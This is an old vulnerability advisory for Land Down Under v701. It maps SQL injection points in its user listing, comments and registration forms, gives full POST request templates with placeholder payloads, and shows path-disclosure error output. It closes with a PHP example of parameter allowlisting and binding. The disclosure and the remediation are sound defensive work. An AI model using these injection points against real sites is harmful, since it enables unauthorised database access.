Multiple SQL-injections in Land Down Under v701

Date: 30.10.04
Application: Land Down Under v701
Platform: PHP
Severity: Medium
Link: http://www.neocrome.net

Vendor Status

Vulnerabilities have been fixed.

Details

An input validation vulnerability was reported in Land Down Under v701. A remote user can conduct an SQL injection attack.

1. SQL-injections in GET

/users.php?f=1&s=1'[sql code here]&w=asc&d=50
/users.php?f=1&s=name&w=1'[sql code here]&d=50
/users.php?f=1&s=name&w=asc&d=1'[sql code here]
/users.php?f=1&s=1'[sql code here]&w=asc
/users.php?f=1&s=name&w=1'[sql code here]
/comments.php?id=1"[sql code here]

2. SQL-injections in POST

POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1

POST /auth.php?m=register&a=add HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1

3. Path disclosures:

/plug.php?h=1'

Result:

<...>
Warning: fopen(system/help/1.txt): failed to open stream: No such file or directory in /home/neocrome/public_html/system/core/plug.inc.php on line 266
Couldn't find a file : system/help/1.txt
<...>

POST /auth.php?m=login&a=check HTTP/1.1
Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

PHPSESSID="&rusername=1&rpassword=1&x=1&rcookiettl=1

Result:

<...> ion_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /home/neocrome/public_html/system/common.php on line 169
<...>

Impact

A remote user can execute SQL commands on the underlying database.

Solution

Check for update: http://www.neocrome.net/index.php?msingle&id91.
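
The parameters listed in sections 1 and 2 fall into two classes that need different handling, shown here as an added example (not Land Down Under source code and not the vendor's fix). It assumes `s` is a sort column, `w` a sort direction and `d` a row offset; the `users` table, its column names, the helper functions and the in-memory SQLite database are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: request value => real column name.
const SORT_COLUMNS = ['name' => 'user_name', 'id' => 'user_id', 'email' => 'user_email'];

// Return a request parameter only if it is a plain string (not an array).
function str_param(array $src, string $key): string
{
    return is_string($src[$key] ?? null) ? $src[$key] : '';
}

function list_users(PDO $db, array $get): array
{
    // s and w end up in ORDER BY, where placeholders cannot be bound, so they
    // only select one of a fixed set of strings; the raw input never reaches SQL.
    $column = SORT_COLUMNS[str_param($get, 's')] ?? 'user_name';
    $way = strtolower(str_param($get, 'w')) === 'desc' ? 'DESC' : 'ASC';

    // d is assumed to be a row offset: digits only, capped.
    $d = str_param($get, 'd');
    $offset = ctype_digit($d) ? min((int) $d, 100000) : 0;

    $stmt = $db->prepare(
        "SELECT user_id, user_name FROM users ORDER BY $column $way LIMIT 50 OFFSET :off"
    );
    $stmt->bindValue(':off', $offset, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function register_user(PDO $db, array $post): void
{
    // rusername and remail are data values, so they are bound as parameters.
    $stmt = $db->prepare('INSERT INTO users (user_name, user_email) VALUES (:n, :e)');
    $stmt->execute([':n' => str_param($post, 'rusername'), ':e' => str_param($post, 'remail')]);
}

// Constructed demo data and requests, shaped like the advisory's test strings.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_name TEXT, user_email TEXT)');
register_user($db, ['rusername' => 'alice', 'remail' => 'alice@example.test']);
register_user($db, ['rusername' => '"[sql code here]', 'remail' => 'b@example.test']);
$probe = "1'[sql code here]";
$rows = list_users($db, ['f' => '1', 's' => $probe, 'w' => $probe, 'd' => $probe]);
printf("%d rows returned, sorted by the default column\n", count($rows));
```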